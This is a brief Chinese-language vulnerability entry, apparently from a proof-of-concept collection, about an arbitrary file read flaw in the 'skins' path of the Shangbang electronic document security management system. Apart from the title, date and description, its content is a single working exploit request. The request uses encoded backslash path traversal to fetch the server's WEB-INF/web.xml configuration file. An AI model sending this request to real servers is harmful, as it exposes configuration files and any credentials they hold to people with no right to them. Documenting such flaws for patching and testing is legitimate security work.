上邦电子文档安全管理系统 skins 任意文件读取漏洞

日期: 2025-10-23 | 影响软件: 上邦电子文档安全管理系统 | POC: 已公开

漏洞描述

上邦电子文档安全管理系统 skins 任意文件读取漏洞

PoC代码

GET /docsafe/sc/skins/..%5C..%5C..%5CWEB-INF%5Cweb.xml HTTP/1.1